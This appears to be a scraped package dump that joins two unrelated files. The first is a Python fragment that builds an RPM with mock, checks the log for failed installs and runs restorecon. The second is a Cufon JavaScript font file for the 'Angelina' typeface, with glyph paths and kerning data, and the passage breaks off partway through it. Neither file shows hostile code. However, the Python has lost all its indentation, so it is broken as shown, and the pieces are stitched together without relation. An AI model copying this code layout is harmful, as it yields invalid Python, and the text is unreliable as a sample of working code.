additional_mock_opts = kwargs.get('additional_mock_opts')
datadir = os.path.realpath(self.config_options.datadir)
mock_config = os.environ.get('MOCK_CONFIG')
install_after_build = self.config_options.install_after_build
self.verbose_build = kwargs.get('verbose')
# Find src.rpm
for rpm in os.listdir(output_dir):
if rpm.endswith(".src.rpm"):
src_rpm = '%s/%s' % (output_dir, rpm)
try:
# And build package
with io.open("%s/mock.log" % output_dir, 'a',
encoding='utf-8', errors='replace') as self.mock_fp:
mock_opts = ['-v', '-r', '%s/%s' % (datadir, mock_config),
             '--resultdir', output_dir]
if additional_mock_opts:
    mock_opts += [additional_mock_opts]
mock_opts += ['--rebuild', src_rpm]
sh.env('/usr/bin/mock', *mock_opts,
       postinstall=install_after_build,
       _err=self._process_mock_output,
       _out=self._process_mock_output)
if install_after_build:
# Check for warning about built packages failing to install
with open("%s/mock.log" % output_dir, 'r') as fp:
mock_content = fp.readlines()
warn_match = re.compile(
r'\W*WARNING: Failed install built packages.*')
for line in mock_content:
m = warn_match.match(line)
if m is not None:
raise Exception('Failed to install built packages')
# All went fine, create the $OUTPUT_DIRECTORY/installed file
open('%s/installed' % output_dir, 'a').close()
finally:
with open("%s/mock.log" % output_dir, 'r') as fp:
mock_content = fp.readlines()
# Append mock output to rpmbuild.log
with open('%s/rpmbuild.log' % output_dir, 'a') as fp:
for line in mock_content:
fp.write(line)
# Finally run restorecon
try:
sh.restorecon('-Rv', output_dir)
except Exception as e:
logger.info('restorecon did not run correctly, %s' % e) | PypiClean |
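# A self-contained sketch of the post-build log scan performed above (the
# sample log lines are made up for illustration):
#
#     import re
#
#     warn_match = re.compile(r'\W*WARNING: Failed install built packages.*')
#     mock_log = [
#         'INFO: Done(foo.src.rpm)  Config(dlrn-centos)  2 minutes',
#         ' WARNING: Failed install built packages',
#     ]
#     if any(warn_match.match(line) is not None for line in mock_log):
#         raise Exception('Failed to install built packages')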
/NuPlone-2.2.0.tar.gz/NuPlone-2.2.0/plonetheme/nuplone/skin/templates/style/euphorie/fonts/angelina-cufon.js | Cufon.registerFont({"w":2576,"face":{"font-family":"Angelina","font-weight":400,"font-stretch":"normal","units-per-em":"2100","panose-1":"0 0 4 0 0 0 0 0 0 0","ascent":"1680","descent":"-420","x-height":"94","cap-height":"153","bbox":"-505.11 -1364 1691.45 835","underline-thickness":"20","underline-position":"-123","unicode-range":"U+0020-U+00FF"},"glyphs":{" ":{"w":544},"!":{"d":"225,-1089v26,0,60,32,49,62v-60,164,-90,367,-90,610v0,147,31,239,87,283v21,17,22,33,9,43v-8,6,-21,3,-42,-4v-70,-24,-139,-164,-145,-258v-10,-161,7,-311,35,-483v28,-169,61,-253,97,-253xm284,87v0,21,-49,50,-69,50v-41,0,-62,-15,-62,-46v0,-37,21,-56,64,-56v45,0,67,17,67,52","w":418,"k":{"\u00d0":63,"\u00c1":78,"\u00c2":54,"\u00c0":273,"\u00d1":39,"\u00c9":342,"~":142,"y":121,"x":-24,"v":25,"u":-44,"t":85,"r":-24,"q":-50,"p":-25,"o":-24,"n":-52,"m":-96,"k":-45,"j":-92,"h":-33,"f":29,"e":-42,"c":-35,"b":-58,"a":-28,"`":90,"Z":-41,"Y":-38,"X":-65,"W":-21,"T":-32,"S":26,"R":-56,"Q":-51,"P":-53,"O":-52,"M":-32,"L":-58,"K":-86,"I":-38,"H":-82,"G":-51,"F":-28,"E":-33,"D":-43,"C":-63,"B":-53,"A":-32,"@":113,"?":43,";":130,":":141,"6":-21,"5":-44,"2":-70,"1":-22,"0":-34,".":415,"-":87,",":72,")":77,"&":67,"%":-34,"#":101,"!":125}},"\"":{"d":"356,-852v-1,90,-72,220,-128,260v-18,13,-51,13,-50,-14v0,-11,6,-23,19,-32v45,-30,65,-129,52,-217v-4,-22,44,-52,69,-52v25,0,38,18,38,55xm223,-852v-1,90,-72,220,-128,260v-18,13,-51,13,-50,-14v0,-11,6,-23,19,-32v45,-30,65,-129,52,-217v-3,-23,43,-52,69,-52v25,0,38,18,38,55","w":426},"#":{"d":"680,-113v-2,21,-11,31,-27,31v-23,0,-33,-15,-29,-46v19,-159,81,-359,184,-598v107,-249,217,-429,321,-544v30,-33,104,10,68,50v-103,111,-211,286,-323,526v-112,240,-176,434,-194,581xm1322,-884v-1,29,-16,43,-42,37v-346,-77,-953,-22,-1219,85v-20,8,-43,3,-43,-21v0,-16,10,-28,29,-36v202,-84,614,-144,908,-144v137,0,249,11,335,32v22,5,33,21,32,47xm1331,-570v0,29,-16,43,-42,37v-345,-77,-953,-22,-1219,85v-21,7,-43,2,-43,-22v0,-16,10,-28,29,-35v202,-85,614,-145,909,-145v137,0,248,11,335,33v21,5,32,21,31,47xm281,-44v-2,21,-11,31,-27,31v-23,0,-33,-15,-29,-46v19,-160,81,-359,184,-598v108,-249,217,-428,321,-544v31,-34,104,11,68,50v-103,111,-210,286,-322,526v-112,240,-177,434,-195,581","w":1362,"k":{"\u00d0":426,"\u00c1":667,"\u00c2":110,"\u00c0":873,"\u00a2":-114,"\u00d1":402,"\u00c9":953,"~":393,"z":29,"y":31,"w":21,"v":-59,"u":23,"t":132,"s":35,"r":-35,"q":155,"o":62,"m":-76,"l":-43,"k":-66,"j":105,"h":-30,"g":139,"f":86,"e":95,"d":226,"c":87,"b":-53,"a":209,"`":30,"Z":93,"Y":-81,"X":41,"W":21,"V":-41,"U":-67,"T":-82,"S":-73,"R":-113,"Q":-71,"P":-111,"O":-69,"N":-25,"M":-41,"L":96,"K":-118,"J":187,"I":138,"H":91,"G":-60,"F":-87,"E":-90,"D":-70,"C":-39,"A":197,"@":30,";":289,":":617,"9":-40,"8":-82,"7":160,"3":100,"0":-77,"\/":314,".":1026,"-":452,",":780,")":259,"&":197,"%":282,"$":-86,"#":138,"!":49}},"$":{"d":"369,-1221v39,-1,123,44,123,84v0,29,-12,43,-35,43v-10,0,-76,-40,-90,-37v-11,-1,-26,2,-45,9v-23,96,-43,202,-58,319v143,12,215,63,215,154v0,57,-26,110,-77,160v-45,43,-99,76,-164,99v1,60,6,111,13,153v4,25,-3,37,-22,37v-17,0,-28,-11,-32,-34v-7,-40,-11,-87,-14,-141v-20,3,-39,5,-56,5v-70,2,-147,-54,-143,-122v2,-34,39,-105,84,-87v-3,35,-19,48,-19,77v0,30,18,45,55,45v20,0,45,-4,76,-12v-1,-84,1,-172,7,-263v-66,-4,-123,-1,-176,-23v-41,-17,-61,-38,-61,-65v0,-49,33,-113,100,-191v64,-75,132,-132,203,-172v14,-60,31,-110,47,-153v14,-39,100,-21,80,24v-11,26,-21,57,-32,92v7,-1,14,-1,21,-1xm193,-806v9,-95,21,-183,36,-266v-48,
34,-89,72,-123,113v-37,45,-55,82,-55,113v0,27,47,41,142,40xm412,-636v0,-53,-62,-92,-116,-92r-40,-2v-9,85,-15,166,-17,243v115,-43,173,-93,173,-149","w":547,"k":{"\u00d0":36,"\u00c1":340,"\u00c2":75,"\u00c0":517,"\u00a2":-117,"\u00c9":609,"~":29,"x":-71,"v":-109,"t":50,"r":-86,"q":114,"p":-39,"o":38,"n":-32,"m":-111,"l":-67,"k":-86,"j":119,"h":-47,"g":117,"f":65,"e":73,"d":218,"c":64,"b":-68,"a":165,"`":184,"Z":198,"X":-101,"W":-113,"V":-52,"U":61,"T":35,"S":-92,"Q":-79,"O":-77,"N":-113,"M":-100,"L":83,"K":-140,"I":-41,"H":21,"G":-67,"E":35,"D":-94,"C":-43,"B":-157,"A":127,";":250,":":171,"9":-72,"8":-116,"7":79,"3":236,"2":-85,"1":64,"0":-95,"\/":286,".":271,"-":66,",":339,")":90,"(":-25,"&":142,"%":260,"$":-46,"#":70,"!":23}},"%":{"d":"601,-940v21,3,104,6,143,2v44,-38,85,-70,123,-96v24,-16,62,-7,71,17v7,19,0,38,-25,58v-218,162,-376,322,-590,589v-173,216,-293,396,-353,543v-14,34,-59,36,-58,-7v0,-8,2,-16,6,-24v59,-137,161,-304,308,-502v147,-198,293,-368,440,-507v-28,-2,-53,-6,-76,-11v-32,107,-79,168,-141,181v-73,15,-120,-19,-118,-100v0,-41,13,-87,39,-138v26,-51,51,-76,73,-76v23,0,34,10,34,30v0,6,-5,16,-16,30v-41,53,-61,103,-61,149v0,35,7,52,21,52v44,0,81,-49,111,-147v-53,-23,-79,-55,-76,-98v3,-37,23,-56,61,-56v54,0,82,37,84,111xm393,-238v-5,-17,57,-49,74,-49v53,0,80,36,81,108v1,34,-12,78,-39,131v-33,64,-70,101,-113,110v-73,16,-118,-18,-118,-99v0,-42,14,-88,40,-139v26,-51,50,-76,72,-76v23,0,34,10,34,31v0,1,-12,22,-38,62v-26,40,-39,79,-39,117v0,34,7,51,21,51v49,0,123,-145,121,-195v-3,-76,-35,-60,-73,-25v-10,-6,-24,-11,-23,-27xm542,-955v-3,-30,-10,-45,-21,-45v-7,0,-11,-1,-11,2v0,20,11,34,32,43","w":895,"k":{"\u00d0":344,"\u00c1":365,"\u00c2":283,"\u00c0":603,"\u00a2":-94,"\u00d1":319,"\u00c9":255,"~":138,"z":217,"y":218,"x":82,"w":205,"v":178,"u":178,"t":205,"s":230,"r":147,"q":185,"p":203,"o":194,"n":180,"m":124,"l":-101,"k":-96,"j":153,"i":-47,"h":-56,"g":216,"f":62,"e":175,"d":230,"c":182,"b":-49,"a":208,"`":-92,"Z":-24,"Y":-152,"X":-92,"V":-46,"U":-121,"T":-155,"S":47,"R":-142,"Q":-53,"P":-154,"O":-58,"M":-44,"K":-163,"J":-42,"I":-156,"G":28,"F":-90,"E":-74,"D":-63,"C":84,"A":191,"@":256,"?":24,";":450,":":369,"9":32,"8":43,"7":-119,"6":129,"4":43,"3":78,"1":-26,"0":-23,"\/":275,".":329,"-":374,",":427,")":83,"(":48,"&":188,"%":223,"$":-124,"#":91}},"&":{"d":"475,-107v-18,0,-66,-98,-61,-110v0,-60,40,-112,125,-139r231,-73v83,-33,125,-79,125,-138v0,-39,-19,-69,-58,-92v-39,-23,-58,-38,-58,-45v0,-19,12,-29,36,-29v31,0,63,19,99,55v90,88,70,222,-28,287v-84,57,-208,68,-346,113v-45,15,-66,40,-66,68v0,12,31,63,28,75v0,19,-9,28,-27,28xm814,-840v0,37,-69,74,-92,29v-43,-83,-112,-123,-204,-123v-104,0,-174,38,-211,115v-8,18,-12,35,-12,52v0,47,33,91,98,133v3,2,57,28,159,81v15,8,115,2,129,14v25,10,38,27,38,51v0,30,-29,41,-61,34v-66,-16,-149,-11,-188,-12v-45,-2,-101,17,-170,57v-76,45,-129,95,-155,153v-43,93,-10,161,73,218v68,47,141,71,245,73v221,4,379,-165,299,-403v-6,-18,0,-39,20,-34v15,3,26,16,35,40v64,181,17,331,-135,417v-96,54,-202,73,-320,60v-130,-14,-302,-154,-302,-291v0,-31,7,-61,21,-90v51,-114,180,-231,306,-265v-118,-54,-177,-123,-177,-207v0,-29,7,-60,22,-91v58,-126,178,-184,353,-171v37,3,81,20,134,50v63,36,95,73,95,110","w":1062,"k":{"\u00d0":-43,"\u00c1":218,"\u00c2":77,"\u00c0":432,"\u00a2":-95,"\u00d1":-67,"\u00c9":133,"~":163,"v":-84,"s":-27,"r":-57,"q":39,"p":-25,"n":-34,"m":-110,"l":-36,"k":-62,"j":97,"h":-29,"g":68,"f":44,"e":33,"d":113,"c":28,"b":-53,"a":67,"`":230,"Z":84,"Y":71,"X":60,"W":-104,"V":59,"U":60,"T":69,"S":-71,"Q":-72,"P":21,"O":-72,"N":-26,"M":21,"L":114,"K":-112,"J":310,"I":16
9,"G":-67,"C":-53,"B":-100,"A":59,"?":104,";":220,":":139,"9":-36,"8":-82,"7":161,"5":-26,"3":34,"2":44,"1":81,"0":-77,"\/":159,".":207,",":284,")":275,"&":146,"%":142,"$":-48,"#":35,"!":54}},"'":{"d":"235,-852v-2,90,-72,220,-129,260v-18,12,-51,13,-49,-14v0,-11,6,-22,18,-32v37,-29,56,-85,56,-169v0,-39,-14,-59,18,-82v38,-27,88,-28,86,37","w":284},"(":{"d":"124,-509v-18,79,-27,160,-27,245v0,216,66,344,199,383v27,38,17,89,-45,73v-85,-22,-147,-85,-190,-193v-55,-139,-63,-404,-25,-570v47,-212,177,-462,324,-556v25,-15,46,-1,57,26v9,22,8,40,-4,53v-151,175,-247,355,-289,539","w":465,"k":{"\u00d0":186,"\u00c1":111,"\u00c2":140,"\u00c0":388,"\u00d1":161,"\u00c9":196,"~":184,"z":99,"y":245,"x":36,"w":126,"v":115,"u":95,"t":203,"s":139,"r":82,"q":119,"o":150,"n":53,"m":21,"l":-37,"k":-32,"j":25,"i":53,"g":169,"f":145,"e":130,"d":60,"c":147,"b":25,"a":45,"`":45,"Z":21,"Y":-62,"X":-81,"W":44,"V":28,"U":-27,"T":-60,"S":99,"R":-61,"Q":34,"P":-66,"O":34,"N":24,"L":-33,"K":-90,"J":93,"I":-97,"H":-58,"G":118,"F":-22,"C":91,"@":224,"?":71,";":119,":":270,"8":58,"7":-73,"6":87,"4":109,"3":73,"2":-25,"0":74,".":269,"-":210,",":95,")":69,"(":130,"&":259,"%":-21,"#":131,"!":84}},")":{"d":"91,189v-14,9,-28,14,-42,14v-32,2,-38,-23,-22,-42v150,-174,249,-371,300,-589v18,-79,27,-160,27,-245v0,-216,-66,-344,-199,-384v-9,-15,-14,-28,-14,-40v0,-31,20,-41,59,-32v85,19,147,84,190,192v55,138,63,405,25,570v-47,211,-176,462,-324,556","w":463,"k":{"\u00d0":-132,"\u00c1":85,"\u00c0":351,"\u00a2":-187,"\u00d1":-157,"\u00c9":36,"~":-37,"z":-82,"y":-72,"x":-137,"w":-96,"v":-161,"u":-102,"t":-98,"s":-132,"r":-142,"q":-72,"p":-99,"o":-87,"n":-110,"m":-187,"l":-124,"k":-145,"j":-22,"i":-99,"h":-115,"g":-49,"f":-123,"e":-93,"c":-90,"b":-142,"a":-41,"Z":-22,"Y":-128,"X":-53,"W":-190,"V":-148,"U":-135,"T":-139,"S":-155,"R":-179,"Q":-159,"P":-174,"O":-163,"N":-177,"M":-181,"K":-199,"J":53,"I":-98,"H":-100,"G":-150,"F":-160,"E":-170,"D":-199,"C":-147,"B":-220,"A":-94,"@":-77,"?":-113,";":142,":":58,"9":-120,"8":-176,"7":-56,"6":-101,"5":-135,"4":-109,"3":-78,"2":-180,"1":-83,"0":-161,"\/":47,".":110,"-":-109,",":177,")":127,"(":-96,"%":30,"$":-159,"#":-57,"!":-34}},"*":{},"+":{},",":{"d":"116,150v-29,11,-44,4,-44,-21v0,-15,9,-25,28,-32v54,-22,104,-119,113,-192v3,-21,24,-32,63,-32v30,0,45,13,44,39v-1,35,-23,79,-66,131v-45,54,-91,90,-138,107","w":453,"k":{"\u00d0":343,"\u00c1":92,"\u00c2":49,"\u00c0":291,"\u00a2":281,"\u00d1":298,"~":448,"z":-67,"x":-36,"w":-47,"v":122,"u":-63,"t":156,"s":-24,"r":-38,"q":-60,"p":-29,"o":-42,"n":-67,"m":-106,"k":-25,"j":-53,"h":-39,"f":100,"e":-66,"d":-56,"c":-53,"b":-51,"a":-67,"`":431,"Z":-67,"Y":100,"X":-80,"W":254,"V":324,"T":304,"S":29,"R":261,"Q":-30,"P":267,"O":-47,"N":270,"M":280,"K":-80,"I":50,"G":-45,"F":64,"E":102,"D":253,"C":-67,"B":-34,"@":160,"?":376,";":175,":":106,"9":126,"8":39,"7":25,"6":-31,"5":-40,"4":363,"3":-143,"2":-86,"1":68,"0":-21,"\/":-23,".":90,"-":366,",":166,")":128,"&":59,"%":-23,"$":296,"#":189,"!":171}},"-":{"d":"569,-370v-31,-6,-80,-49,-113,-56v-21,-4,-44,-6,-67,-6v-44,0,-146,23,-306,69v-40,11,-68,-15,-63,-50v6,-41,250,-84,318,-88v98,-6,146,3,206,34v41,22,58,47,53,75","w":671,"k":{"\u00d0":-94,"\u00c1":109,"\u00c0":286,"\u00a2":-94,"\u00d1":-138,"\u00c9":664,"~":586,"z":258,"y":-65,"x":71,"w":-94,"v":-87,"u":-74,"t":-100,"s":-129,"r":-93,"p":-73,"o":-55,"n":-78,"m":-158,"l":-92,"k":-126,"j":140,"i":-83,"h":-92,"f":-64,"e":-45,"d":51,"c":-47,"b":-126,"a":49,"`":483,"Z":154,"Y":45,"X":57,"W":193,"V":262,"T":252,"S":-61,"R":71,"Q":-148,"O":-148,"N":130,"M":121,"L":72,"K":-170,"J"
:228,"I":121,"H":-88,"G":-146,"F":-132,"E":-85,"C":-140,"B":-32,"A":53,"@":-63,"?":147,";":202,":":95,"9":-113,"8":95,"7":93,"6":-92,"5":-156,"4":-105,"3":100,"2":273,"1":22,"0":-146,"\/":151,".":288,"-":-70,",":357,")":223,"(":-83,"&":69,"%":151,"$":-97}},".":{"d":"192,19v-33,1,-73,-29,-73,-62v0,-35,18,-52,54,-52v52,0,78,15,78,45v0,46,-20,69,-59,69","w":305,"k":{"\u00d0":147,"\u00c2":-43,"\u00c0":115,"\u00a2":85,"\u00d1":102,"\u00c9":-67,"~":252,"z":-164,"y":-42,"x":-136,"w":-131,"v":118,"u":-148,"t":168,"s":-124,"r":-125,"q":-182,"p":-120,"o":-126,"n":-156,"m":-190,"l":-85,"k":-124,"j":-235,"i":-90,"h":-129,"g":-141,"f":118,"e":-150,"d":-151,"c":-136,"b":-140,"a":-161,"`":236,"Z":-193,"Y":83,"X":-180,"W":73,"V":136,"U":-83,"T":116,"S":89,"R":74,"Q":-127,"P":79,"O":-129,"N":91,"M":69,"L":86,"K":-162,"J":-162,"I":120,"H":67,"G":-132,"F":93,"E":81,"D":70,"C":-156,"B":31,"A":-115,"@":225,"?":241,";":224,"9":198,"8":78,"7":-71,"6":-121,"5":-138,"4":179,"3":-256,"2":-187,"1":117,"0":-105,"\/":-120,"-":170,",":229,")":179,"(":-73,"&":-25,"%":-120,"$":101,"#":192,"!":256}},"\/":{"d":"-30,173v-14,34,-59,36,-58,-7v0,-8,2,-16,6,-24v75,-174,211,-385,408,-632v204,-257,384,-438,541,-544v26,-16,58,-7,71,19v11,19,7,35,-12,47v-154,104,-334,281,-542,529v-206,246,-348,449,-414,612","w":895,"k":{"\u00d0":339,"\u00c1":612,"\u00c2":369,"\u00c0":900,"\u00a2":-91,"\u00d1":314,"\u00c9":663,"~":136,"z":313,"y":271,"x":104,"w":306,"v":207,"u":293,"t":231,"s":338,"r":174,"q":471,"p":228,"o":360,"n":291,"m":195,"l":-81,"k":-76,"j":177,"i":-27,"h":-38,"g":462,"f":81,"e":392,"d":480,"c":388,"b":-31,"a":510,"`":-96,"Y":-135,"X":-69,"W":30,"V":-28,"U":-103,"T":-137,"S":65,"R":-124,"Q":-35,"P":-136,"O":-39,"M":-23,"K":-143,"I":-137,"G":45,"F":-68,"E":-53,"D":-43,"C":102,"A":290,"@":279,"?":46,";":587,":":509,"9":50,"8":63,"7":-96,"6":146,"4":62,"3":101,"\/":568,".":737,"-":369,",":795,")":106,"(":65,"&":212,"%":240,"$":-121,"#":109,"!":27}},"0":{"d":"292,168v-100,0,-185,-63,-255,-188v-56,-99,-85,-190,-88,-273v-4,-162,15,-308,57,-439v61,-188,165,-306,310,-353v20,-6,67,17,62,39v0,29,-25,51,-74,64v-89,23,-165,118,-224,288v-63,182,-72,409,5,595v55,133,131,200,232,200v106,0,196,-76,268,-230v64,-136,100,-252,100,-410v0,-114,-18,-214,-54,-300v-45,-106,-107,-159,-188,-159v-39,0,-70,37,-91,110v-17,17,-37,19,-49,-3v-6,-11,-7,-21,-5,-33v11,-73,91,-138,172,-139v94,0,170,63,229,190v118,254,83,533,-41,774v-93,178,-215,267,-366,267","w":844,"k":{"\u00d0":-86,"\u00c1":131,"\u00c2":37,"\u00c0":334,"\u00a2":-132,"\u00d1":-111,"\u00c9":79,"~":27,"z":-34,"y":-29,"x":-77,"w":-49,"v":-112,"u":-57,"t":-51,"s":-86,"r":-90,"q":-31,"p":-53,"o":-42,"n":-63,"m":-140,"l":-72,"k":-94,"j":61,"i":-51,"h":-65,"f":-74,"e":-49,"d":48,"c":-46,"b":-92,"`":98,"Z":26,"Y":-41,"W":-139,"V":-80,"U":-50,"T":-47,"S":-103,"R":-93,"Q":-109,"P":-89,"O":-113,"N":-112,"M":-118,"L":78,"K":-148,"J":155,"H":-50,"G":-106,"F":-100,"E":-96,"D":-129,"C":-99,"B":-159,"A":-48,"@":-29,"?":-44,";":190,":":104,"\/":97,".":153,"-":-63,",":223,")":211,"(":-48,"&":49,"%":78,"$":-87}},"1":{"d":"253,-1055v39,-1,82,32,80,71v0,15,-17,85,-52,210v-60,217,-90,418,-90,603v0,127,23,190,70,190r85,0v32,-2,115,57,109,90r-4,30v-21,-3,-44,-13,-68,-30v-16,-11,-39,-16,-68,-16v-60,0,-151,31,-274,92v-27,13,-44,20,-51,20v-28,0,-42,-14,-42,-43v0,-31,70,-73,209,-127v-49,-72,-43,-178,-43,-294v0,-151,22,-319,65,-504v23,-95,34,-160,35,-193v-19,5,-45,30,-76,77v-30,44,-54,66,-73,66v-31,0,-46,-13,-46,-40v0,-27,33,-68,99,-123v64,-53,109,-79,135,-79","w":518,"k":{"\u00d0":140,"\u00c1":35,"\u00c2":34,"\u00c0":298,
"\u00a2":43,"\u00d1":115,"\u00c9":175,"~":177,"z":-46,"y":143,"x":-66,"v":79,"u":-50,"t":159,"r":-62,"p":-67,"n":-92,"m":-124,"k":-25,"j":115,"i":20,"h":-69,"g":140,"f":61,"d":-43,"a":-70,"`":116,"Z":-79,"X":-107,"W":21,"V":32,"S":44,"R":-27,"P":-24,"L":-108,"K":-69,"J":191,"I":-54,"H":-131,"C":-27,"B":-80,"A":-84,"@":184,"?":75,";":82,":":120,"\/":-68,".":249,"-":163,")":27,"(":26,"&":149,"%":-85,"$":23,"#":135,"!":81}},"2":{"d":"508,-1014v174,0,297,84,296,251v0,69,-45,149,-135,240v-120,122,-401,316,-566,446v-82,65,-121,116,-121,147v0,6,9,9,28,9v33,0,110,-20,233,-60v127,-42,219,-63,277,-63v79,0,195,56,195,131v0,25,-15,49,-44,72r-51,0v18,-43,27,-66,27,-69v0,-33,-48,-49,-145,-49v-137,-1,-289,76,-402,119v-43,15,-77,23,-102,23v-48,0,-106,-55,-106,-103v0,-50,45,-116,136,-197v36,-32,131,-107,285,-224v129,-99,223,-179,282,-240v82,-85,123,-159,123,-220v0,-93,-53,-139,-158,-139v-157,0,-338,63,-543,188v-41,25,-66,38,-73,38v-37,0,-55,-17,-55,-52v0,-23,10,-46,35,-59r63,-32v205,-105,378,-157,521,-157","w":895,"k":{"\u00d0":144,"\u00c1":168,"\u00c2":140,"\u00c0":413,"\u00a2":-85,"\u00d1":118,"\u00c9":174,"~":27,"z":57,"y":100,"x":-38,"w":78,"u":44,"t":160,"s":76,"q":56,"p":39,"o":88,"n":21,"k":-31,"j":133,"i":60,"g":112,"f":114,"e":66,"d":55,"c":82,"a":35,"`":74,"Z":21,"Y":-30,"W":-98,"V":-64,"U":-48,"T":-42,"S":-34,"R":-90,"P":-86,"N":-89,"M":-104,"K":-93,"J":304,"I":49,"H":-27,"F":-77,"E":-87,"D":-109,"C":25,"B":-130,"@":101,"?":-21,";":181,":":221,"\/":34,".":251,"-":174,",":139,")":127,"(":41,"&":172,"$":-77,"#":35,"!":75}},"3":{"d":"887,-857v0,-98,-119,-145,-229,-138v-184,12,-392,85,-498,175v-11,10,-24,15,-40,15v-35,0,-53,-15,-53,-44v0,-43,65,-91,194,-142v133,-53,264,-79,391,-79v215,0,322,74,322,221v0,97,-67,190,-202,279v-43,29,-122,73,-238,132v199,14,298,94,298,240v0,102,-63,197,-188,284v-115,81,-224,121,-328,121v-235,0,-387,-89,-456,-266v-12,-19,-8,-47,12,-53v14,-4,27,0,34,17v48,121,194,212,359,212v105,0,210,-29,316,-88v119,-66,179,-144,179,-234v0,-105,-110,-157,-329,-157v-3,-4,-149,29,-221,29v-26,0,-39,-10,-39,-30v0,-31,22,-54,67,-66v28,-7,72,-15,129,-33v114,-37,220,-90,320,-154v133,-86,200,-166,200,-241","w":944,"k":{"\u00d0":53,"\u00c1":117,"\u00c2":38,"\u00c0":351,"\u00a2":-190,"\u00d1":30,"\u00c9":28,"~":-72,"y":-26,"x":-150,"w":-35,"v":-74,"u":-61,"t":34,"s":-39,"r":-112,"q":-58,"p":-57,"o":-46,"n":-60,"m":-116,"l":-147,"k":-153,"i":-94,"h":-118,"g":-27,"f":-62,"e":-64,"c":-57,"b":-124,"a":-31,"`":-89,"Z":-52,"Y":-187,"X":-76,"W":-189,"V":-191,"U":-190,"T":-197,"S":-133,"R":-233,"Q":-125,"P":-229,"O":-129,"N":-209,"M":-217,"L":-29,"K":-218,"I":-144,"H":-29,"G":-100,"F":-211,"E":-219,"D":-239,"C":-94,"B":-238,"A":-48,"?":-153,";":209,":":142,"\/":50,".":101,"-":72,",":175,")":124,"(":-66,"&":33,"%":32,"$":-202,"#":-98,"!":-50}},"4":{"d":"689,-512v93,-16,161,23,206,96r-17,59v-43,-47,-99,-70,-168,-70v-3,0,-16,5,-41,15v-32,195,-26,228,-26,403v0,101,18,162,53,183v22,13,45,31,70,56v-41,8,-62,12,-63,12v-57,0,-102,-41,-129,-124v-37,-115,-37,-209,-12,-352v12,-72,18,-125,19,-158v-156,38,-229,59,-339,108v-39,17,-95,37,-165,67v-51,22,-82,34,-94,34v-41,0,-62,-17,-62,-50v-5,-4,92,-203,87,-193v58,-145,108,-271,126,-381r25,-150v17,-88,41,-132,70,-132v34,0,51,23,51,68v-2,134,-177,615,-237,716v85,-21,497,-161,553,-194v15,-87,37,-191,68,-310v42,-163,75,-244,100,-244v35,0,53,17,53,51v0,25,-21,103,-63,233v-38,117,-60,203,-65,257","w":906,"k":{"\u00d0":-154,"\u00c1":80,"\u00c0":255,"\u00a2":-124,"\u00d1":-174,"\u00c9":141,"~":91,"z":31,"y":-71,"w":-92,"v":-87,"u":-100,"t":-95,"s":-129,"r":-115,"q":-28,"p":-99,"o
":-82,"n":-105,"m":-183,"l":-115,"k":-143,"j":44,"i":-98,"h":-115,"g":-22,"f":-86,"e":-74,"d":44,"c":-76,"b":-143,"`":22,"Z":45,"Y":-86,"X":-25,"W":-55,"V":-48,"U":-73,"T":-90,"S":-85,"R":-114,"Q":-160,"P":-111,"O":-162,"N":-62,"M":-74,"K":-192,"J":-298,"I":-84,"H":-102,"G":-148,"F":-150,"E":-93,"D":-97,"C":-149,"B":-96,"A":-25,"@":-69,";":124,":":75,".":213,"-":-130,",":149,")":81,"(":-96,"&":37,"$":-116,"!":-25}},"5":{"d":"674,-1098v70,0,132,49,133,114v0,30,-12,47,-36,52v-24,5,-37,-18,-30,-41v1,-3,1,-7,1,-10v0,-26,-33,-39,-99,-39v-99,0,-234,39,-405,116v-33,130,-83,254,-148,373v-9,17,-16,30,-20,39v182,-104,336,-156,463,-156v181,0,329,74,329,240v0,29,-4,59,-13,92v-39,148,-141,274,-307,377v-148,93,-291,139,-429,139v-146,0,-208,-58,-181,-174v5,-19,52,-89,73,-89v26,0,34,17,24,52v-17,12,-30,34,-30,64v0,43,41,65,122,65v120,0,248,-45,385,-135v145,-95,231,-201,262,-315v39,-142,-67,-238,-203,-238v-115,0,-280,62,-495,186v-44,25,-72,38,-83,38v-34,0,-51,-11,-51,-34v0,-15,15,-47,45,-95v66,-104,117,-238,155,-386v-19,12,-54,28,-69,28v-36,0,-50,-18,-47,-51v5,-50,331,-172,399,-185v80,-16,165,-27,255,-27","w":916,"k":{"\u00d0":-115,"\u00c1":110,"\u00c0":309,"\u00a2":-93,"\u00d1":-138,"\u00c9":88,"~":660,"z":-23,"y":-32,"x":35,"w":-53,"v":-82,"u":-79,"t":-44,"s":-96,"r":-79,"q":-29,"p":-61,"o":-60,"n":-88,"m":-162,"l":-65,"k":-94,"j":98,"i":-46,"h":-66,"f":-80,"e":-60,"d":51,"c":-63,"b":-95,"`":103,"Z":50,"Y":-54,"W":34,"V":42,"U":-28,"T":-56,"S":-76,"R":-59,"Q":-110,"P":-67,"O":-114,"N":69,"M":43,"L":87,"K":-142,"J":61,"I":-50,"H":-49,"G":-102,"F":-101,"E":-42,"D":25,"C":-104,"A":-53,"?":124,";":182,":":88,"\/":117,".":162,"-":-91,",":227,")":163,"(":-44,"&":50,"%":100,"$":-68,"!":25}},"6":{"d":"693,-977v-17,0,-124,-33,-152,-33v-56,0,-123,43,-202,130v-67,74,-116,146,-147,216v-93,211,-138,374,-135,489v5,189,58,283,161,283v47,0,103,-31,170,-94v59,-55,102,-109,131,-164v63,-120,93,-221,91,-303v-3,-99,-45,-149,-126,-149v-81,0,-160,54,-237,163v-73,103,-108,199,-105,287v-6,30,40,103,44,119v1,22,-11,33,-35,33v-41,0,-80,-116,-80,-162v0,-115,36,-226,116,-333v87,-116,187,-174,302,-174v128,0,201,97,204,226v3,124,-41,255,-131,394v-100,153,-210,230,-333,230v-95,0,-177,-61,-204,-135v-27,-72,-42,-154,-42,-246v0,-170,40,-333,121,-490v50,-97,115,-185,194,-264v102,-102,197,-154,287,-154v58,0,161,36,161,87v0,29,-16,44,-53,44","w":777,"k":{"\u00d0":-85,"\u00c1":127,"\u00c2":34,"\u00c0":328,"\u00a2":-88,"\u00d1":-109,"\u00c9":78,"~":467,"w":-35,"v":-76,"u":-55,"t":-30,"s":-76,"r":-61,"q":-22,"p":-44,"o":-38,"n":-62,"m":-138,"l":-63,"k":-79,"j":104,"i":-30,"h":-50,"f":-64,"e":-43,"d":61,"c":-42,"b":-79,"`":50,"Z":29,"Y":-112,"X":-70,"W":-48,"V":23,"U":-64,"T":-93,"S":-70,"R":-79,"Q":-94,"P":-94,"O":-98,"N":80,"M":36,"L":35,"K":-127,"J":-23,"I":-124,"H":-36,"G":-92,"F":-86,"E":-26,"D":40,"C":-86,"A":-38,"?":143,";":199,":":112,"\/":112,"."